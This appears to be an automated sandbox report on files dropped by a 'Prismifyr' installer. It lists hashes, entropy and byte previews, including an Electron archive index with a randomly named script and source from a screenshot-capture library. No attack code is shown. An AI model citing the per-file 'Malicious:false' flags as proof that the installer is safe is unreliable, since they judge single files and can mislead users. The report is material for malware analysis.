                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.#...j./...k.>...l.I...n.Q...o.V...p.c...q.i...r.u...s.....t.....v.....w.....y.C...z.q...|.....}.................................................$.....%.....&.....+.....=.....M.....a.....x.............................W...................................N.....d.................K....._.................4.....C.......................+.................,.....R...........P.................'.......................5.......................6.......................s...........L.....h.................:.....U.............................\.......................N ..... .....!.....!....o!.....!.....!....."....p".....".....#.....#....n#.....#.....#.....#....Z$.....$.....$.....$....s%.....%....$&....=&.....&.....&.....'....8'.....'.....'....+(....L(.....(.....)....H)....X).....)....4*....}*.....*.....+....P+....q+.....+.....+....2,....Z,....l,.....,....H-.....-.....-....2............/...../...../...../....@0....]0.....0....R1.....1.....1.....2....l2.....2.....2....:3.....3.....3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1439472
                                                                                                                                                                                                                        Entropy (8bit):4.048168870459246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:cg2yHsU3/YSTDZkE0uJzZKGfd5k62sntRdRtm1vYpiMyf:nBHPL/eGLKGfd52sntRdRtm1vYpiMyf
                                                                                                                                                                                                                        MD5:42EE2510D5A0ADAAF7159B1F5AC2F6AC
                                                                                                                                                                                                                        SHA1:677A50F6371766400FD5D3C24F3CF4E5271C8FDA
                                                                                                                                                                                                                        SHA-256:5F591D92C509269B7AF0501621499E01A411F1F306C014670B562D1E5341BBE3
                                                                                                                                                                                                                        SHA-512:F2427A67B825263C469D85B99E9EE221C5DD8CD377C7276BF3408A2218DFAFD1DF1A75AE2F5A7A7E6220003159F55D8709D62301F662DF0DF2E64514FBA15D01
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.!...q.'...r.3...s.b...t.y...v.....w.....y.....z./...|.V...}...............................................................................E.......................-.....c.................".........................................`...........&.....d.....e ....X!.....!.....!.....".....#....#$....K$.....%.....&.....'....r'.....(.....*.....*....N+....o,.....-....%.....k....../.....0....w1.....1.....3....Q4....*5.....5.....7....<8....99.....9.....:....U;.....;.....;.....<.....=....'>....X>....@?.....@....v@.....@.....A.....B....qC.....C.....D.....E.....F....XF....FG....1H.....H.....H.....I.....J....3K....gK....aL....RM.....M.....M....ZO.....P.....Q.....Q.....R.....S....!T...._T....BU.....V....fV.....V.....W....uX....@Y.....Y.....Z.....[....G\.....\.....]....j^.....^....._....:`....>a.....a....!b.....c.....d.....e.....e.....g.....i....+k....ck.....l.....m.....n.....n....ap.....q....7r.....r.....s.....t.....t....Iu....{v.....w....Hx
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1329927
                                                                                                                                                                                                                        Entropy (8bit):4.304376870326233
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:bKQ11U7McKNq0yRcJ7FgnC8ybtKRT52bNcW3pk8W9fhBp3p1FZCnATitlF2iJk78:GQ11Ae50UHVj
                                                                                                                                                                                                                        MD5:9177F1295B89C8F57F402CED3D8BC473
                                                                                                                                                                                                                        SHA1:40B3EC3EE6F2FAC2C5A2F6771DC6E6C8F3BE9E68
                                                                                                                                                                                                                        SHA-256:C04CEB579D0874AFFEB36787919937F195B5EC4D4ECD999F5A44BA1EF2DE5085
                                                                                                                                                                                                                        SHA-512:84C797EC7BEC69F313F43FC72D299FCE47E7120D8A1A46FA804B2784A9EF975EEDC992D63CEA324FBA5688B1BA615B8C56E63EF72AD30B1FCCC415B622FE31C7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'{.e.J...h.R...i.l...j.x...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.9...w.e...y.....z.....|.....}.......;.....@.....H.....P.....X....._.....f.....m.....n.....o.....t.......................n...........'...........T.................2.................!...........F.................;.....v.....X...... ....T ..... .....!....h".....".....#....7$.....%....|%.....%...._'.....(....U).....).....*.....+....u,.....,.....-..........y/...../....'1....S2....Q3.....3.....5....t6....T7.....7.....8....J9.....9.....9.....:.....;....,<....m<.....=....F>.....>.....>....C@....-A.....A.....B....EC.....D.....D.....D.....F.....F....NG.....G.....H....~I.....I....5J....[K..../L.....L.....L....HN....>O.....O.....P.....Q.....Q....)R....pR....;S.....S.....T....<T.....U.....U....xV.....V.....X.....Y.....Y....3Z....4[.....[....D\.....\.....].....^....3_....._.....`.....a....*b....fb....8d.....e.....f....1g.....h.....i.....j.....j....Fl....3m.....m.....n.....o.....o....Op.....p.....q.....r.....s
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1117461
                                                                                                                                                                                                                        Entropy (8bit):4.3419217530445815
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:EDtO4bQ5N9LyZYAPTKznLCVsjU7ynaO1vuB5UzKdfL3fgj8uRU+wunRUdG4Lw+wz:Ece5hNC
                                                                                                                                                                                                                        MD5:821E1C0CD7AC4CC96E047DF5F9B741D5
                                                                                                                                                                                                                        SHA1:CDBE922B53E89C801ED6596392F852F14DBD5BE4
                                                                                                                                                                                                                        SHA-256:2DA181190B745BB7D5F6CB296D86FF87CC6DCF66404E9D991D74434AB47E4BFF
                                                                                                                                                                                                                        SHA-512:CD85F3A28C69D0C6D6A2D61EEAFB6B24AE991E0BA55CBC5ADDE966DE172111E77C6B11992D6E17C6CD1D1F2F138813CF74EBA41B60ED5B3A7A77DF9B789AB08F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........&~.e.D...h.L...i.T...j._...k.n...l.t...o.|...p.....q.....r.....s.....t.....v.....w.B...y.i...z.....|.....}...................%.....0.....8.....=.....E.....L.....S.....Z.....\.....a.......................H.....Y.....0.......................l.............................t.......................i...........\...........).....J...........f.............................'.................* ..... ..... .....!....^".....".....#.....#....r$.....$.....%.....%.....&.....&.....'....R(....A).....)....?*.....+.....+.....,....D,.....-.....-....+.....L....../...../.....0.....0.....0.....1....#2....M2.....3.....3....@4....d4....05.....5....Q6....x6....+7.....7.... 8....;8.....9.....9....1:....X:....r;....o<....3=....[=.....>.....>.....>.....?.....?....V@.....@.....@....tA.....A....[B.....B.....C....`D.....D....fE.....F....{F.....F.....F.....G....HH.....H.....H.....I....WJ.....J.....K.....L.....M.....M.....M.....O.....P.....P....0Q....#R.....R....TS.....S....:T.....T....-U....LU....UV.....W.....W
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):567766
                                                                                                                                                                                                                        Entropy (8bit):5.615123804510951
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:cBr+XqdY9flVXHzNs7DQqZFwbyt+545MI8JX:GjmVq+54538JX
                                                                                                                                                                                                                        MD5:EF23040BF284AD019F7E85BF1A4B66D5
                                                                                                                                                                                                                        SHA1:7D119FDA04B876AFF2B3C3DBB8DA6410FF1B0122
                                                                                                                                                                                                                        SHA-256:25387C543BE8057F77D05FB6E19991F954B1D8FF47B369ED15CB23541AC8DF6C
                                                                                                                                                                                                                        SHA-512:B5E7E4787F26B9E2EC0672709F2BC06D01075E4B5D298352FF79EDBA39E3BCE2EAE60C65A597B051ECB2F964B89061A8F409BB6A4CDBD3383B00D0AA5B81EBB2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'_.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.1...v.f...w.....y.....z.....|.....}.?.....h.....m.....u.....}...................................................................................o.................O.................$.......................].......................a.......................H.......................R...................................7.....T.................K.....\.................:.....J...........6.....y...................................H.......................H.......................E ..... ..... ..... ....E!.....!.....!.....!....X".....".....".....#....f#.....#.....#.....$....c$.....$.....$.....$....`%.....%.....%.....&.....&.....'....V'....o'.....'....5(....b(....~(.....(....()....J)....e).....).....*....G*....Y*.....*....0+....j+.....+.....+....9,....X,....h,.....,....,-....W-....l-.....-....@.................G/...../...._0....q0.....1....v1.....1.....1....s2.....2....-3....I3.....3.....4....=4....R4.....4....+5....d5
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):975392
                                                                                                                                                                                                                        Entropy (8bit):4.869006844107044
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:7MHxWlFx4gaqwmsSr+rhqdgZ0ZYd0IniML5iB3IjsHAf+rTjuuKLNiXErqXYjgX:7MHlY45kr9
                                                                                                                                                                                                                        MD5:1DB1D8C2E71770619619D81310B33575
                                                                                                                                                                                                                        SHA1:ECCA21ADDE149A552049E3EAFCE846A4050FD405
                                                                                                                                                                                                                        SHA-256:368097DC4F8380A9AAC54BB6ED9022CB730C2B1446ED0C2993EDC77FCF5ADF7F
                                                                                                                                                                                                                        SHA-512:C0AB5EBCEF2F7502C992DE2DE373918EE4D7BE64D7A4DF3837D0E48A4846582ED54B608D1EF4682DBE7793F5821DB551FCB5531189F00E83A10EB8EA5C4E807C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........z'..e.z...h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.+...v.`...w.....y.....z.....|.....}.9.....b.....g.....o.....w.................................................................=.....(...........~...........b...........h...........].............................,.................w...........^.........................................l.............................-.....i...... ..... .....!....;!.....!....z".....".....".....#....g$.....$.....%.....%.....&....>'....x'.....(....q(.....(.....(....b).....).....*....?*.....*....>+....|+.....+....N,.....,....L-....s-............................./.....0....X0....q0.....1.....1.....1.....1....t2.....2....B3....]3....V4....&5.....5.....5.....6.....7....G7....i7.....7....?8....h8.....8....;9.....9....Z:....u:....j;.....<.....<.....=.....=.....>....B>....o>.....?.....?.....?.....@.....@....cA.....A.....B.....C.....C....nD.....D....}E....AF.....F.....G.....G....JH.....H.....H....KI.....I.....J....$J.....J.....K.....L
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):850951
                                                                                                                                                                                                                        Entropy (8bit):5.15322498626967
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:cEYAPc7FC8PIARlaXd28NJry41cfP5k66EhTCkORvlpQYrlYVwadcJKwUku5co/u:cEDPSb55CPn
                                                                                                                                                                                                                        MD5:12CADB58E2CF3D01FB9BF1E9632A7B85
                                                                                                                                                                                                                        SHA1:C26507BF4BFD247AD51622314357A2F3CCF0F60C
                                                                                                                                                                                                                        SHA-256:4ECF19C5A4EADD8909FF709803204CAC4607590572B3AE6E3CF23C20E5B7476C
                                                                                                                                                                                                                        SHA-512:6266F68CCC1B73B3A3944A43615BA23BE266CD65F12A080D2331F609A182D8EEE2B0553719071FF7F111DC38B92A544BAC08F24EFC26068032C7FF89DA46D50D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.-...l.8...n.@...o.E...p.R...q.X...r.d...s.....t.....v.....w.....y.2...z.`...|.....}.........................................................................2.....L.....j...........f.............................-.......................S.......................Z.................w...........C.....d...........s.................p...........1.....^.....'...........$.....]........................ ..... ....X!.....!.....!....."....c#.....#.....$.....$.....%....C&....t&.....&....T'.....'.....'....7(.....(.....(.....)....}).....)....+*....E*.....*....f+.....+.....+....m,.....,....M-....k-.....-....v.................a/...../...."0....50.....0....@1.....1.....1....p2.....3.....3.....3....]4.....4.....5....I5.....5....*6....W6.....6.....7.....7.....7.....7.....8....L9.....9.....9.....:.....:....1;....T;.....<.....<.....<.....=.....=....S>.....>.....?.....?.....@.....A....-A.....B.....B....9C....xC....CD.....D....@E....nE.....F....}F.....F.....F.....G....#H....{H
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):673832
                                                                                                                                                                                                                        Entropy (8bit):5.789004316339002
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:joKSvbq+c8ZoET9VwMNgFu088xY2GbfEj2Wx5a8hZ7cE8UO+mziKHrvacQ1h8:j0vW+c8JVDgo07xHss5a8T7RlO+wiKLp
                                                                                                                                                                                                                        MD5:5238502D80387898467B5A6564D2E197
                                                                                                                                                                                                                        SHA1:574AFDACA5F77F0470C218D0D945F76B38C0C192
                                                                                                                                                                                                                        SHA-256:760436664A06F4C716991F45E17E00645738E8D1C46CD04A116DEA8D1DEDB5AA
                                                                                                                                                                                                                        SHA-512:FEA65FF62F13CD42C425C5055813277B9A0565C515C5CA8DB4A4C8505B57F56A8DF52D8E201355FA33D65B7D243CF2E6B1796E81C2DAEEE027DFAFA7B86B6C55
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........n'..e.b...h.j...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.Q...w.}...y.....z.....|.....}.*.....S.....X.....`.....h.....p.....w.....~...........................................................S.................v...........K.....b.................................../.......................C.....i.....u...........K.................6.................2.......................2...........C.................3.............................?.................x .....!....u!.....!....."....s"....."....."....+#.....#.....#.....#....F$.....$.....$.....%.....%.....&....I&....`&.....&....6'....m'....~'.....'....H(....|(.....(.....(....U).....).....).....*....z*.....*.....*....v+.....,....|,.....,.....-.....-.....-.....-....Z.................c/...../.....0..../0.....0....l1.....1....#2.....2.....3....<3....^3.....3....[4.....4.....4....R5.....5.....6..../6.....6....w7.....7.....7.....8....]9.....9.....9....y:.....:.....;....0;.....;.....<....6<....J<.....<....|=.....=.....=
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):485251
                                                                                                                                                                                                                        Entropy (8bit):6.680383992214284
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:F+Fhet0dfPhgYzhJxs7+56PCXTH61pH59zb/4krv7HpulM:F+bemJPhpzh3L56PCXTHiH5Zr4krTT
                                                                                                                                                                                                                        MD5:2FC83A1CFF581DAE87B348D407BA0EF9
                                                                                                                                                                                                                        SHA1:98CD327CB51E8E3A6271B81ECEDD050ECFD50244
                                                                                                                                                                                                                        SHA-256:245F45EBD9302FD62BA185D23AC9B31CBEECFC0E75B942C49AFF69314950B556
                                                                                                                                                                                                                        SHA-512:74A211F52FBEC1AD3418BBF073E216951D6F48CC71355D9E48E73275A640D0217342B4FC56D0B815E07900305F960806F751BC1FB976DD1D69D73016F0262AE3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........7'&.e.....h.....i.....j.....k.5...l.<...m.D...o.k...p.p...q.v...r.....s.....t.....v.....w.)...|.P...}.........................................................................................../...........@......................._.......................f.......................o.......................n.......................9.....`.....m.................@.....Z...........5.....v.................D.....x.................*.....S....._.................E.....W...........,.....j.....|.................%.....?.............................N.......................+.......................3.............................k.......................I ....q ....} ..... ...."!....K!....W!.....!....="....~"....."....."....-#....M#....a#.....#.....$.....$....E$.....$.....$.... %....2%.....%.....%.....&....3&.....&.....&.....&.....&....O'.....'.....'.....'....O(.....(.....(.....(....k).....)....$*....6*.....*.....+....:+....O+.....+.....+....%,....4,.....,.....,.....,.....,....R-.....-.....-.....-....N.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):479821
                                                                                                                                                                                                                        Entropy (8bit):6.689183400042816
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/WIM+T9wPrTT5ti65JyF72/Yu/lVNt5YQznGhkUnKFieWTl:/WkT9wLfi5qNlVNt5YQzn19S
                                                                                                                                                                                                                        MD5:074D612C1FC2F37EAD06E8C71CBDDAB4
                                                                                                                                                                                                                        SHA1:DF25B1A209CAE6047373C720200C249D891DB32F
                                                                                                                                                                                                                        SHA-256:825E00DD5BC5FB3C81EFF63F69089A0C7D3B4244E46A5006D0763D8BAB48F5B2
                                                                                                                                                                                                                        SHA-512:1AA86CB089287B1A06617E717A0540CDB6B3C1C1A6FED6C10B0E5AD17AC9EDD7CAC017840EA0141042306EDF4120320536144F0BA3F41448771ACC2EE7505F47
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'U.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.#...t.:...v.o...w.....y.....z.....|.....}.H.....q.....v.....~.................................................................L.......................h.......................T.......................P.......................8.............................^.......................<.....b.....|...........9.....h.....}...........0.....^.....k.................<.....H.................C.....U...........-.....k.....}.......................1.....{.......................C.............................l.......................I.....r.....~...........2.....a.....m.................;.....D.................. ....! ..... ..... .....!....2!....~!.....!.....!.....!....D".....".....".....#....^#.....#.....#.....#....G$....x$.....$.....$....!%....5%....A%.....%.....%.....&.... &.....&.....&.....'.....'.....'.....(....Q(....`(.....(..../)....g)....|).....)....2*....[*....g*.....*.....*.....*.....+....a+.....+.....+.....+....Q,.....,
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5629760
                                                                                                                                                                                                                        Entropy (8bit):7.9961542187986705
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:98304:riNUsliLKTPeIoXG13dkfCG3KJSml2rwrxySNYtu397pE2RSvc:SUGiLKT1gG103KJSmQkrxOwkvc
                                                                                                                                                                                                                        MD5:B4220B606112777AAA2F05581952C334
                                                                                                                                                                                                                        SHA1:321DE8057EA88B971137819D658D46E5F8EC210C
                                                                                                                                                                                                                        SHA-256:2EEDDA8CF79F4BD074D4F626EC29A9CE63DE24BC6834A272657830445C388470
                                                                                                                                                                                                                        SHA-512:E29C049F0765CE4158DF535167E8392B0B6434E5068095BEC9040903217DC34E0BC2A54F95AE778EC46CB761F8C2BCC2ACAFFD9A4FFDF65C5E44927CF79F43DC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:............f.."..{.*-..|../..~..3.....F.....H..........X............................. .....?.....U...........8..........D.....D.....DE....DO....D.....D.....D~....Dt....D|"...D.#..LE.#..ME#'..NE.(..WE.-..XE>7..YE.E.._E.f..`E.g..aE.h..cE i..dEjn..eE.t..fEnd..gE.N..hE.O...E.Q...E.b...E.d...E#h...E.j...E.p...E.v...E.....Ed....E.....E.....E.....E.....E:....Eb....E.....E.....E/....E.....E.....L....)LZ...*L....+Lg...,L^...-L.!...Q.1...Q|<...Q.D...Q.H...QfK...Q.V...Q)W...QZX...Q.Y...Q.....Q.....R.....Rd....dC....d$....d<....d.....dr....d5"...d.%...ds'..Pd.2..Qd.7..Rd.=..Sd.K..Td.N..UdWS..Vd.T..Wd.V..nd.W..od.Z..pd._..qdDj...d.q...d.z...d'....d.....d....de....d.....d....di....d.....d.....dP....d.....d.....f.....f<....f........................ .....V...........V.....G......"................)...../...........!.....h.....P.................$...C%...s*..../....1....>...EA....J....N....N.........g............6........B....N....;....t..................<...\.k...].....^...
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):75430490
                                                                                                                                                                                                                        Entropy (8bit):6.189743555035015
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:393216:Y8IhYGTbTzrRILjOc0yo0KGp4SlmeQYZ09kpkzANtP6ChuVk:Y8IlTzrRI/Wy4MO9kpkzANtP6ChuVk
                                                                                                                                                                                                                        MD5:8294F41A837E9DE92B2445969D8A768C
                                                                                                                                                                                                                        SHA1:0A685467806ABF1471D64197DE18D643734D3E8D
                                                                                                                                                                                                                        SHA-256:9890C6063BD729C1C85A629DE6223689EB880B6AAD0CA44A23E2466640ECFF65
                                                                                                                                                                                                                        SHA-512:850A390B6890C268DA8FB166865982F9D1C9BEDB084FC86367FA5032119D3B089F6EAB34F719101CEDD7428CC75293485C1DC4E575137D80D9C4E819285D5A75
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...............{"files":{"YBdaKzmzrqQQG3qe.js":{"size":5018905,"integrity":{"algorithm":"SHA256","hash":"c5c27d038a4c6d4cdf227ec00fda88d2e29f5ff7e0c076fcd7d66a86654908bf","blockSize":4194304,"blocks":["968c9c2c378540e5ae57a7904eb1eb546aef016113a6b1605a6388b4a5e63325","38f4a587edfef3223065c013775e7413b73f7f92b042cef5adb20085662f3edb"]},"offset":"0"},"package.json":{"size":667,"integrity":{"algorithm":"SHA256","hash":"c263ad98800b308d8f431667714e101307d635a26c86ab6e44fb172691207a53","blockSize":4194304,"blocks":["c263ad98800b308d8f431667714e101307d635a26c86ab6e44fb172691207a53"]},"offset":"5018905"},"node_modules":{"files":{"asynckit":{"files":{"LICENSE":{"size":1078,"integrity":{"algorithm":"SHA256","hash":"1953150d5d4b10c7542cee6f6e0c613b2682545233f069d75cfff1936386ce10","blockSize":4194304,"blocks":["1953150d5d4b10c7542cee6f6e0c613b2682545233f069d75cfff1936386ce10"]},"offset":"5829791"},"bench.js":{"size":1256,"integrity":{"algorithm":"SHA256","hash":"b6c4a058c4fd03900f3786ef216322d5
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                        Entropy (8bit):4.6764683698176395
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:jUML/BcEMLcBcESKsML0Bc9jBSMglR3L3iBRW:bBNBRD8B2jBSMUR38W
                                                                                                                                                                                                                        MD5:394A6022C9E7AA401B3C992C4B92EA94
                                                                                                                                                                                                                        SHA1:CAE58C8959C078B24484148A0D09DA816D350699
                                                                                                                                                                                                                        SHA-256:125C1A517628169F4E66E0E237D201BE226AFB5C704A684AEE5155DE69281685
                                                                                                                                                                                                                        SHA-512:CBD75168E3054A8412EEC7FC1415AD1906D8A3228A16A486674909BEC0F3A8B177F02E4C9C3419598E13FB0676D87132E82EE1182549C69C6BCF59FB59AAF0CE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:'strict mode'..if (process.platform === 'linux') {. module.exports = require('./lib/linux').} else if (process.platform === 'darwin') {. module.exports = require('./lib/darwin').} else if (process.platform === 'win32') {. module.exports = require('./lib/win32').} else {. module.exports = function unSupported () {. return Promise.reject(new Error('Currently unsupported platform. Pull requests welcome!')). }.}.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5878
                                                                                                                                                                                                                        Entropy (8bit):4.766163417842046
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:5+QUeOlMpnYW+6o9wGXxtwWMK6kZWiLMSnNjee+e9mO8q70VwJmyV5q+uMxKvWE:wQtdpL+9wWx2WKSxNjeb9O/70VwJmyVc
                                                                                                                                                                                                                        MD5:BE6B78C29A2DEA28F09518A9735CBCFC
                                                                                                                                                                                                                        SHA1:8663483EE07F4B018588104715309CADA602A9C8
                                                                                                                                                                                                                        SHA-256:F84C2F6429051E0CF0D5D20AAEDADDF1B92807FED19509740D9857A90AE49DE9
                                                                                                                                                                                                                        SHA-512:DA105344D0AFC548F7655A2107B35D6E305EFCC5D71A93862C342C071571AFBB7F651ECC08A7A950708FE3C1599C691BC31642D0FE826C774CF69B9350A5943A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:const exec = require('child_process').exec.const temp = require('temp').const fs = require('fs').const utils = require('../utils').const path = require('path')..const { unlinkP, readAndUnlinkP } = utils..function darwinSnapshot (options = {}) {. const performScreenCapture = displays => new Promise((resolve, reject) => {. // validate displayId. const totalDisplays = displays.length. if (totalDisplays === 0) {. return reject(new Error('No displays detected try dropping screen option')). }. const maxDisplayId = totalDisplays - 1. const displayId = options.screen || 0. if (!Number.isInteger(displayId) || displayId < 0 || displayId > maxDisplayId) {. const validChoiceMsg = (maxDisplayId === 0) ? '(valid choice is 0 or drop screen option altogether)' : `(valid choice is an integer between 0 and ${maxDisplayId})`. return reject(new Error(`Invalid choice of displayId: ${displayId} ${validChoiceMsg}`)). }.. const format = options.format || 'jpg'. le
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5440
                                                                                                                                                                                                                        Entropy (8bit):4.694700038490346
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:9CLjAz83t+bInwLdA+0y32wLdA+e9wLdA+AuHk2D1L0qn+rm3QB/CP9l9ODIW:9CLjA7sedATyGedAhedA3090Lrm3Hl9c
                                                                                                                                                                                                                        MD5:9EEF143BB254A49647C6F2785C227652
                                                                                                                                                                                                                        SHA1:0BC4A7DD54EB59DF78C2B9ED5547129A5F6300A3
                                                                                                                                                                                                                        SHA-256:99F5D0448DF25A2C105711DD8576481EC11A6DD2D900AC2CC5C3B489FEC3DEF6
                                                                                                                                                                                                                        SHA-512:1DC9206FD8F94BAA0EC2CED9F36A8D7E5256B204BFE6FF7FFF41CCE4EC8B017348B55578D16ABB9F71191285B871ACA2AF7E9589787F4E0D2D99047D2C9820A0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:const exec = require('child_process').exec.const path = require('path').const defaultAll = require('../utils').defaultAll..const EXAMPLE_DISPLAYS_OUTPUT = `Screen 0: minimum 320 x 200, current 5760 x 1080, maximum 8192 x 8192.eDP-1 connected (normal left inverted right x axis y axis). 2560x1440 60.00 +. 1920x1440 60.00. 1856x1392 60.01. 1792x1344 60.01. 1920x1200 59.95. 1920x1080 59.93. 1600x1200 60.00. 1680x1050 59.95 59.88. 1600x1024 60.17. 1400x1050 59.98. 1280x1024 60.02. 1440x900 59.89. 1280x960 60.00. 1360x768 59.80 59.96. 1152x864 60.00. 1024x768 60.04 60.00. 960x720 60.00. 928x696 60.05. 896x672 60.01. 960x600 60.00. 960x540 59.99. 800x600 60.00 60.32 56.25. 840x525 60.01 59.88. 800x512 60.17. 700x525 59.98. 640x512 60.02. 720x450 59.89. 640x480 60.00 59.94. 680x384 59.80 59.96. 5
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1076
                                                                                                                                                                                                                        Entropy (8bit):4.329342498829439
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:TIeCkk3i97CL3tZ9QIC6CiRmojxItKLCkY/4IwccDHnkEgxIkBIozW:TIeW0kpQGHnCtlbiHkxCkSozW
                                                                                                                                                                                                                        MD5:46F2F241643026741F8E08DED147AAC9
                                                                                                                                                                                                                        SHA1:44F7890B08FF2C596A381863A1B097BA4CE9B0D2
                                                                                                                                                                                                                        SHA-256:857CF82F33D021558AAE989AE47FDAEF22CEEDE17EC7492C92FC8052253F3C75
                                                                                                                                                                                                                        SHA-512:B04EA14AEBF6F3C6335AA38734C23E62640FDA6DA9180A98290EB495E422E32C4A882F074667A4CAB46873685216B76FD30C7122F150CC23AA228CCC58985573
                                                                                                                                                                                                                        Malicious:false
